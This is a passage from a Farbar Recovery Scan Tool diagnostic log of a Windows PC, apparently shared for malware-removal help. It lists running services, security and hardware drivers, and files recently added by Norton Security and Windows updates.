R2 RealSenseDCM; C:\Program Files (x86)\Common Files\Intel\RSDCM\bin\win32\RealSenseDCM.exe [3663512 2015-10-15] (Intel® Corporation)
S3 ShareItSvc; C:\Program Files (x86)\Lenovo\SHAREit\Shareit.Service.exe [31176 2016-01-20] (SHAREit Technologies Co.Ltd)
R2 SystemUsageReportSvc_WILLAMETTE; C:\Program Files (x86)\Intel\Intel® RealSense Application Recommender\SUR\SurSvc.exe [118424 2016-03-09] ()
R2 UpdateAgentService; C:\Program Files\update\UpdateAgent.exe [226216 2016-02-17] ()
S3 USER_ESRV_SVC_WILLAMETTE; C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe [416408 2016-03-09] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\\WsAppService.exe [411648 2016-03-31] (Wondershare) [File not signed]
S3 WsDrvInst; C:\Program Files (x86)\Wondershare\TunesGo\DriverInstall.exe [116368 2016-05-06] (Wondershare)
S2 SystemUpdateBeatService; C:\Program Files (x86)\Lenovo\Driver & Application Auto-installation\SystemUpdateBeat\SystemUpdateBeatService.exe [X]
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
R3 BHDrvx64; C:\Program Files (x86)\Norton Security\NortonData\\Definitions\BASHDefs\20160613.001\BHDrvx64.sys [1832176 2016-06-13] (Symantec Corporation)
R3 ccSet_NS; C:\Windows\system32\drivers\NSx64\1606000.08E\ccSetx64.sys [173808 2015-07-10] (Symantec Corporation)
R3 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497392 2016-06-15] (Symantec Corporation)
U3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156912 2016-06-15] (Symantec Corporation)
R0 Fastboot; C:\Windows\System32\DRIVERS\Fastboot.sys [71416 2016-02-17] (Windows ® Win 7 DDK provider)
R0 FBFsmon; C:\Windows\System32\DRIVERS\FBFsmon.sys [43256 2016-02-17] (Windows ® Win 7 DDK provider)
R3 IDSVia64; C:\Program Files (x86)\Norton Security\NortonData\\Definitions\IPSDefs\20160615.001\IDSvia64.sys [876248 2016-06-15] (Symantec Corporation)
R3 IXCamera; C:\Windows\system32\DRIVERS\RealSenseDCM.sys [72704 2015-10-15] (Intel® Corporation)
R3 MEIx64; C:\Windows\System32\drivers\TeeDriverW8x64.sys [185600 2015-10-09] (Intel Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security\NortonData\\Definitions\VirusDefs\20160616.002\ENG64.SYS [138456 2016-06-15] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security\NortonData\\Definitions\VirusDefs\20160616.002\EX64.SYS [2148056 2016-06-15] (Symantec Corporation)
S3 NETwNe64; C:\Windows\System32\drivers\NETwew01.sys [3343872 2015-10-30] (Intel Corporation)
R3 Qcamain10x64; C:\Windows\System32\drivers\Qcamain10x64.sys [2374704 2015-10-23] (Qualcomm Atheros, Inc.)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-05-20] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [886528 2015-05-28] (Realtek )
R3 semav6msr64; C:\Windows\system32\drivers\semav6msr64.sys [21984 2016-03-09] ()
R3 SRTSP; C:\Windows\System32\Drivers\NSx64\1606000.08E\SRTSP64.SYS [928504 2016-02-23] (Symantec Corporation)
R3 SRTSPX; C:\Windows\system32\drivers\NSx64\1606000.08E\SRTSPX64.SYS [50936 2015-07-10] (Symantec Corporation)
R3 SymEFASI; C:\Windows\system32\drivers\NSx64\1606000.08E\SYMEFASI64.SYS [1621232 2016-02-23] (Symantec Corporation)
S0 SymELAM; C:\Windows\System32\drivers\NSx64\1606000.08E\SymELAM.sys [24192 2015-07-10] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [111344 2016-06-16] (Symantec Corporation)
R3 SymIRON; C:\Windows\system32\drivers\NSx64\1606000.08E\Ironx64.SYS [295664 2016-02-23] (Symantec Corporation)
R3 SymNetS; C:\Windows\System32\Drivers\NSx64\1606000.08E\SYMNETS.SYS [577768 2016-02-23] (Symantec Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 WsAudioDevice_383; C:\Windows\system32\drivers\VirtualAudio.sys [31080 2015-07-30] (Wondershare)
S3 mfeaack01; \Device\mfeaack01.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-06-16 16:20 - 2016-06-16 16:20 - 00031287 _____ C:\Users\Jennifer JonesSantos\Desktop\FRST.txt
2016-06-16 16:20 - 2016-06-16 16:20 - 00000000 ____D C:\FRST
2016-06-16 16:19 - 2016-06-16 16:19 - 02386944 _____ (Farbar) C:\Users\Jennifer JonesSantos\Desktop\FRST64.exe
2016-06-16 16:04 - 2016-06-16 16:04 - 00000000 ____D C:\Windows\System32\Tasks\Norton Security
2016-06-16 16:00 - 2016-06-16 16:00 - 00000000 ____D C:\Windows\System32\Tasks\Remediation
2016-06-16 16:00 - 2016-06-16 16:00 - 00000000 ____D C:\Program Files\Common Files\AV
2016-06-16 15:50 - 2016-06-16 15:50 - 00111288 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SMR501.SYS.bak
2016-06-16 13:53 - 2016-06-16 13:53 - 00009728 _____ C:\Users\Jennifer JonesSantos\Downloads\SubmissionList_NotCompleted.xls
2016-06-16 10:15 - 2016-06-16 16:11 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\NPE
2016-06-16 07:33 - 2016-06-16 15:59 - 00003388 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2016-06-16 07:33 - 2016-06-16 07:33 - 00111344 _____ (Symantec Corporation) C:\Windows\system32\Drivers\SYMEVENT64x86.SYS
2016-06-16 07:33 - 2016-06-16 07:33 - 00008214 _____ C:\Windows\system32\Drivers\SYMEVENT64x86.CAT
2016-06-16 07:33 - 2016-06-16 07:33 - 00000000 ____D C:\Program Files\Common Files\Symantec Shared
2016-06-16 07:32 - 2016-06-16 15:59 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security
2016-06-16 07:32 - 2016-06-16 15:59 - 00000000 ____D C:\Windows\system32\Drivers\NSx64
2016-06-16 07:32 - 2016-06-16 15:50 - 00000000 ____D C:\ProgramData\Norton
2016-06-16 07:32 - 2016-06-16 07:32 - 00000000 ____D C:\Program Files (x86)\Norton Security
2016-06-16 07:26 - 2016-06-16 07:26 - 00000000 ____D C:\ProgramData\NortonInstaller
2016-06-16 07:26 - 2016-06-16 07:26 - 00000000 ____D C:\Program Files (x86)\NortonInstaller
2016-06-16 07:22 - 2016-06-16 07:23 - 00000000 ____D C:\Users\Jennifer JonesSantos\Downloads\Norton Security-36 Month
2016-06-16 07:22 - 2016-06-16 07:22 - 00000000 ____D C:\Users\Jennifer JonesSantos\AppData\Local\Protexis
2016-06-16 07:21 - 2016-06-16 07:22 - 01548480 _____ (arvato digital services llc) C:\Users\Jennifer JonesSantos\Downloads\Download_Norton_Security-36_Month.exe
2016-06-15 12:25 - 2016-06-15 14:45 - 00000000 ____D C:\Users\Jennifer JonesSantos\Documents\My Received Files
2016-06-15 09:17 - 2016-06-15 09:17 - 00007600 _____ C:\Users\Jennifer JonesSantos\AppData\Local\Resmon.ResmonCfg
2016-06-14 14:12 - 2016-05-28 02:13 - 01401024 _____ (Microsoft Corporation) C:\Windows\system32\appraiser.dll
2016-06-14 14:12 - 2016-05-28 02:13 - 01184960 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2016-06-14 14:12 - 2016-05-28 02:13 - 00514752 _____ (Microsoft Corporation) C:\Windows\system32\devinv.dll
2016-06-14 14:12 - 2016-05-28 02:13 - 00290496 _____ (Microsoft Corporation) C:\Windows\system32\invagent.dll
2016-06-14 14:12 - 2016-05-28 02:13 - 00092352 _____ (Microsoft Corporation) C:\Windows\system32\acmigration.dll
2016-06-14 14:12 - 2016-05-28 02:13 - 00046784 _____ (Microsoft Corporation) C:\Windows\system32\CompatTelRunner.exe
2016-06-14 14:12 - 2016-05-28 01:25 - 04268880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setupapi.dll
2016-06-14 14:12 - 2016-05-28 01:23 - 00388384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ws2_32.dll
2016-06-14 14:12 - 2016-05-28 01:23 - 00312160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mswsock.dll
2016-06-14 14:12 - 2016-05-28 01:22 - 07474528 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2016-06-14 14:12 - 2016-05-28 01:22 - 04387680 _____ (Microsoft Corporation) C:\Windows\system32\setupapi.dll
2016-06-14 14:12 - 2016-05-28 01:22 - 00428896 _____ (Microsoft Corporation) C:\Windows\system32\hal.dll
2016-06-14 14:12 - 2016-05-28 01:22 - 00211296 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tpm.sys
2016-06-14 14:12 - 2016-05-28 01:22 - 00118624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\partmgr.sys
2016-06-14 14:12 - 2016-05-28 01:20 - 00430312 _____ (Microsoft Corporation) C:\Windows\system32\ws2_32.dll
2016-06-14 14:12 - 2016-05-28 01:18 - 00357216 _____ (Microsoft Corporation) C:\Windows\system32\mswsock.dll
2016-06-14 14:12 - 2016-05-28 01:16 - 00026408 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2016-06-14 14:12 - 2016-05-28 01:09 - 00501600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupEngine.dll
2016-06-14 14:12 - 2016-05-28 01:09 - 00170848 _____ (Microsoft Corporation) C:\Windows\system32\NetworkUXBroker.exe
2016-06-14 14:12 - 2016-05-28 01:09 - 00084832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupApi.dll
2016-06-14 14:12 - 2016-05-28 01:08 - 00693600 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupEngine.dll
2016-06-14 14:12 - 2016-05-28 01:08 - 00258912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ufx01000.sys
2016-06-14 14:12 - 2016-05-28 01:08 - 00115040 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupApi.dll
2016-06-14 14:12 - 2016-05-28 01:07 - 03675512 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-06-14 14:12 - 2016-05-28 01:07 - 02921880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-06-14 14:12 - 2016-05-28 01:07 - 01322248 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2016-06-14 14:12 - 2016-05-28 01:07 - 00957608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2016-06-14 14:12 - 2016-05-28 01:07 - 00808288 _____ (Microsoft Corporation) C:\Windows\system32\WWAHost.exe
2016-06-14 14:12 - 2016-05-28 01:07 - 00703840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWAHost.exe
2016-06-14 14:12 - 2016-05-28 01:07 - 00331616 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\pci.sys
2016-06-14 14:12 - 2016-05-28 01:06 - 22561256 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-06-14 14:12 - 2016-05-28 01:06 - 04074160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\explorer.exe
2016-06-14 14:12 - 2016-05-28 01:06 - 00730344 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Shell.Broker.dll
2016-06-14 14:12 - 2016-05-28 01:06 - 00303216 _____ (Microsoft Corporation) C:\Windows\system32\LockAppHost.exe
2016-06-14 14:12 - 2016-05-28 01:06 - 00254656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LockAppHost.exe
2016-06-14 14:12 - 2016-05-28 01:05 - 04515264 _____ (Microsoft Corporation) C:\Windows\explorer.exe
2016-06-14 14:12 - 2016-05-28 01:04 - 00604928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-06-14 14:12 - 2016-05-28 01:04 - 00431296 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2016-06-14 14:12 - 2016-05-28 01:04 - 00360480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2016-06-14 14:12 - 2016-05-28 01:04 - 00161632 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-06-14 14:12 - 2016-05-28 01:04 - 00111064 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll
2016-06-14 14:12 - 2016-05-28 01:04 - 00097096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll
2016-06-14 14:12 - 2016-05-28 01:03 - 00131248 _____ (Microsoft Corporation) C:\Windows\system32\gpapi.dll
2016-06-14 14:12 - 2016-05-28 00:58 - 01996640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2016-06-14 14:12 - 2016-05-28 00:58 - 00379232 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll
2016-06-14 14:12 - 2016-05-28 00:57 - 02548944 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2016-06-14 14:12 - 2016-05-28 00:57 - 02195632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d10warp.dll
2016-06-14 14:12 - 2016-05-28 00:57 - 01594416 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2016-06-14 14:12 - 2016-05-28 00:57 - 01372312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2016-06-14 14:12 - 2016-05-28 00:57 - 00649792 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2016-06-14 14:12 - 2016-05-28 00:57 - 00636304 _____ (Microsoft Corporation) C:\Windows\system32\fontdrvhost.exe
2016-06-14 14:12 - 2016-05-28 00:57 - 00577376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2016-06-14 14:12 - 2016-05-28 00:57 - 00546456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontdrvhost.exe
2016-06-14 14:12 - 2016-05-28 00:57 - 00521664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll
2016-06-14 14:12 - 2016-05-28 00:57 - 00316256 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-06-14 14:12 - 2016-05-28 00:35 - 00123392 _____ (Microsoft Corporation) C:\Windows\system32\tdlrecover.exe
2016-06-14 14:12 - 2016-05-28 00:35 - 00089088 _____ (Microsoft Corporation) C:\Windows\system32\MapsCSP.dll
2016-06-14 14:12 - 2016-05-28 00:35 - 00031744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dumpsdport.sys
2016-06-14 14:12 - 2016-05-28 00:31 - 00091648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tdlrecover.exe
2016-06-14 14:12 - 2016-05-28 00:31 - 00088576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2016-06-14 14:12 - 2016-05-28 00:31 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\MosHostClient.dll
2016-06-14 14:12 - 2016-05-28 00:29 - 22379008 _____ (Microsoft Corporation) C:\Windows\system32\edgehtml.dll
2016-06-14 14:12 - 2016-05-28 00:29 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\adhsvc.dll
2016-06-14 14:12 - 2016-05-28 00:29 - 00045568 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll
2016-06-14 14:12 - 2016-05-28 00:29 - 00019456 _____ (Microsoft Corporation) C:\Windows\system32\httpprxp.dll
2016-06-14 14:12 - 2016-05-28 00:28 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\MusNotification.exe
2016-06-14 14:12 - 2016-05-28 00:28 - 00118272 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll
2016-06-14 14:12 - 2016-05-28 00:28 - 00090112 _____ (Microsoft Corporation) C:\Windows\system32\FwRemoteSvr.dll
2016-06-14 14:12 - 2016-05-28 00:27 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MosHostClient.dll
2016-06-14 14:12 - 2016-05-28 00:27 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\mapsupdatetask.dll
2016-06-14 14:12 - 2016-05-28 00:26 - 00199168 _____ (Microsoft Corporation) C:\Windows\system32\InstallAgent.exe
2016-06-14 14:12 - 2016-05-28 00:26 - 00157184 _____ (Microsoft Corporation) C:\Windows\system32\dmcertinst.exe
2016-06-14 14:12 - 2016-05-28 00:26 - 00145920 _____ (Microsoft Corporation) C:\Windows\system32\omadmclient.exe
2016-06-14 14:12 - 2016-05-28 00:26 - 00120320 _____ (Microsoft Corporation) C:\Windows\system32\MapsBtSvc.dll
2016-06-14 14:12 - 2016-05-28 00:26 - 00074752 _____ (Microsoft Corporation) C:\Windows\system32\MosStorage.dll
2016-06-14 14:12 - 2016-05-28 00:25 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthenum.sys
2016-06-14 14:12 - 2016-05-28 00:25 - 00037376 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll
2016-06-14 14:12 - 2016-05-28 00:24 - 00218624 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2016-06-14 14:12 - 2016-05-28 00:24 - 00124928 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Ndu.sys
2016-06-14 14:12 - 2016-05-28 00:24 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll
2016-06-14 14:12 - 2016-05-28 00:24 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\browserbroker.dll
2016-06-14 14:12 - 2016-05-28 00:24 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\AppCapture.dll
2016-06-14 14:12 - 2016-05-28 00:24 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\moshost.dll
2016-06-14 14:12 - 2016-05-28 00:24 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcsvc6.dll
2016-06-14 14:12 - 2016-05-28 00:24 - 00053760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FwRemoteSvr.dll
2016-06-14 14:12 - 2016-05-28 00:23 - 00155136 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\hidclass.sys
2016-06-14 14:12 - 2016-05-28 00:23 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcsvc.dll
2016-06-14 14:12 - 2016-05-28 00:22 - 00406528 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll
2016-06-14 14:12 - 2016-05-28 00:22 - 00368640 _____ (Microsoft Corporation) C:\Windows\system32\usocore.dll
2016-06-14 14:12 - 2016-05-28 00:22 - 00278528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2016-06-14 14:12 - 2016-05-28 00:22 - 00269824 _____ (Microsoft Corporation) C:\Windows\system32\moshostcore.dll
2016-06-14 14:12 - 2016-05-28 00:22 - 00163328 _____ (Microsoft Corporation) C:\Windows\system32\tetheringservice.dll
2016-06-14 14:12 - 2016-05-28 00:22 - 00161280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InstallAgent.exe
2016-06-14 14:12 - 2016-05-28 00:22 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapsBtSvc.dll
2016-06-14 14:12 - 2016-05-28 00:22 - 00079872 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-06-14 14:12 - 2016-05-28 00:22 - 00059904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MosStorage.dll
2016-06-14 14:12 - 2016-05-28 00:21 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\StoreAgent.dll
2016-06-14 14:12 - 2016-05-28 00:21 - 00239104 _____ (Microsoft Corporation) C:\Windows\system32\BrokerLib.dll
2016-06-14 14:12 - 2016-05-28 00:21 - 00207360 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupSvc.dll
2016-06-14 14:12 - 2016-05-28 00:21 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\wscsvc.dll
2016-06-14 14:12 - 2016-05-28 00:20 - 00641536 _____ (Microsoft Corporation) C:\Windows\system32\enterprisecsps.dll
2016-06-14 14:12 - 2016-05-28 00:20 - 00511488 _____ (Microsoft Corporation) C:\Windows\system32\newdev.dll
2016-06-14 14:12 - 2016-05-28 00:20 - 00332288 _____ (Microsoft Corporation) C:\Windows\system32\polstore.dll
2016-06-14 14:12 - 2016-05-28 00:20 - 00267264 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcore6.dll
2016-06-14 14:12 - 2016-05-28 00:20 - 00199168 _____ (Microsoft Corporation) C:\Windows\system32\GnssAdapter.dll
2016-06-14 14:12 - 2016-05-28 00:20 - 00174080 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Privacy.dll
2016-06-14 14:12 - 2016-05-28 00:20 - 00057344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcsvc6.dll
2016-06-14 14:12 - 2016-05-28 00:19 - 24605696 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-06-14 14:12 - 2016-05-28 00:19 - 00764928 _____ (Microsoft Corporation) C:\Windows\system32\Chakradiag.dll
2016-06-14 14:12 - 2016-05-28 00:19 - 00567808 _____ (Microsoft Corporation) C:\Windows\system32\MBMediaManager.dll
2016-06-14 14:12 - 2016-05-28 00:19 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\bcastdvr.exe
2016-06-14 14:12 - 2016-05-28 00:19 - 00355840 _____ (Microsoft Corporation) C:\Windows\system32\dhcpcore.dll
2016-06-14 14:12 - 2016-05-28 00:19 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcsvc.dll
2016-06-14 14:12 - 2016-05-28 00:18 - 11545088 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-06-14 14:12 - 2016-05-28 00:18 - 07977472 _____ (Microsoft Corporation) C:\Windows\system32\mos.dll
2016-06-14 14:12 - 2016-05-28 00:18 - 00610816 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2016-06-14 14:12 - 2016-05-28 00:18 - 00591360 _____ (Microsoft Corporation) C:\Windows\system32\vpnike.dll
2016-06-14 14:12 - 2016-05-28 00:18 - 00460800 _____ (Microsoft Corporation) C:\Windows\system32\MapConfiguration.dll
2016-06-14 14:12 - 2016-05-28 00:18 - 00392192 _____ (Microsoft Corporation) C:\Windows\system32\IPSECSVC.DLL
2016-06-14 14:12 - 2016-05-28 00:18 - 00380416 _____ (Microsoft Corporation) C:\Windows\system32\SystemEventsBrokerServer.dll
2016-06-14 14:12 - 2016-05-28 00:18 - 00285184 _____ (Microsoft Corporation) C:\Windows\system32\VEEventDispatcher.dll
2016-06-14 14:12 - 2016-05-28 00:17 - 09918976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-06-14 14:12 - 2016-05-28 00:17 - 00963072 _____ (Microsoft Corporation) C:\Windows\system32\iphlpsvc.dll
2016-06-14 14:12 - 2016-05-28 00:17 - 00630784 _____ (Microsoft Corporation) C:\Windows\system32\MessagingDataModel2.dll
2016-06-14 14:12 - 2016-05-28 00:17 - 00485888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\newdev.dll
2016-06-14 14:12 - 2016-05-28 00:17 - 00415232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StoreAgent.dll
2016-06-14 14:12 - 2016-05-28 00:17 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\RDXTaskFactory.dll
2016-06-14 14:12 - 2016-05-28 00:17 - 00278016 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Management.dll
2016-06-14 14:12 - 2016-05-28 00:17 - 00173056 _____ (Microsoft Corporation) C:\Windows\system32\mdmmigrator.dll
2016-06-14 14:12 - 2016-05-28 00:16 - 19344384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-06-14 14:12 - 2016-05-28 00:16 - 00690176 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2016-06-14 14:12 - 2016-05-28 00:16 - 00684544 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2016-06-14 14:12 - 2016-05-28 00:16 - 00592896 _____ (Microsoft Corporation) C:\Windows\system32\AppContracts.dll
2016-06-14 14:12 - 2016-05-28 00:16 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\tileobjserver.dll
2016-06-14 14:12 - 2016-05-28 00:16 - 00406528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2016-06-14 14:12 - 2016-05-28 00:16 - 00291328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\polstore.dll
2016-06-14 14:12 - 2016-05-28 00:16 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcore6.dll
2016-06-14 14:12 - 2016-05-28 00:15 - 01056256 _____ (Microsoft Corporation) C:\Windows\system32\JpMapControl.dll
2016-06-14 14:12 - 2016-05-28 00:15 - 00853504 _____ (Microsoft Corporation) C:\Windows\system32\MapsStore.dll
2016-06-14 14:12 - 2016-05-28 00:15 - 00794624 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2016-06-14 14:12 - 2016-05-28 00:15 - 00535040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2016-06-14 14:12 - 2016-05-28 00:15 - 00349696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapConfiguration.dll
2016-06-14 14:12 - 2016-05-28 00:15 - 00293888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dhcpcore.dll
2016-06-14 14:12 - 2016-05-28 00:15 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2016-06-14 14:12 - 2016-05-28 00:14 - 18674176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\edgehtml.dll
2016-06-14 14:12 - 2016-05-28 00:14 - 01716736 _____ (Microsoft Corporation) C:\Windows\system32\SRHInproc.dll
2016-06-14 14:12 - 2016-05-28 00:14 - 00988160 _____ (Microsoft Corporation) C:\Windows\system32\NMAA.dll
2016-06-14 14:12 - 2016-05-28 00:14 - 00965632 _____ (Microsoft Corporation) C:\Windows\system32\SRH.dll
2016-06-14 14:12 - 2016-05-28 00:14 - 00784384 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-06-14 14:12 - 2016-05-28 00:14 - 00606208 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-06-14 14:12 - 2016-05-28 00:14 - 00499712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MessagingDataModel2.dll
2016-06-14 14:12 - 2016-05-28 00:14 - 00219136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VEEventDispatcher.dll
2016-06-14 14:12 - 2016-05-28 00:14 - 00200192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Management.dll
2016-06-14 14:12 - 2016-05-28 00:13 - 01387520 _____ (Microsoft Corporation) C:\Windows\system32\win32kbase.sys
2016-06-14 14:12 - 2016-05-28 00:13 - 00990208 _____ (Microsoft Corporation) C:\Windows\system32\SharedStartModel.dll
2016-06-14 14:12 - 2016-05-28 00:13 - 00982016 _____ (Microsoft Corporation) C:\Windows\system32\AppxPackaging.dll
2016-06-14 14:12 - 2016-05-28 00:13 - 00954368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\bthport.sys
2016-06-14 14:12 - 2016-05-28 00:13 - 00939520 _____ (Microsoft Corporation) C:\Windows\system32\MapControlCore.dll
2016-06-14 14:12 - 2016-05-28 00:13 - 00587776 _____ (Microsoft Corporation) C:\Windows\system32\bisrv.dll
2016-06-14 14:12 - 2016-05-28 00:13 - 00467456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppContracts.dll
2016-06-14 14:12 - 2016-05-28 00:13 - 00084992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\BTHUSB.SYS
2016-06-14 14:12 - 2016-05-28 00:12 - 00800768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JpMapControl.dll
2016-06-14 14:12 - 2016-05-28 00:12 - 00614400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2016-06-14 14:12 - 2016-05-28 00:12 - 00521728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2016-06-14 14:12 - 2016-05-28 00:11 - 01445888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRHInproc.dll
2016-06-14 14:12 - 2016-05-28 00:11 - 00890368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxPackaging.dll
2016-06-14 14:12 - 2016-05-28 00:11 - 00799744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRH.dll
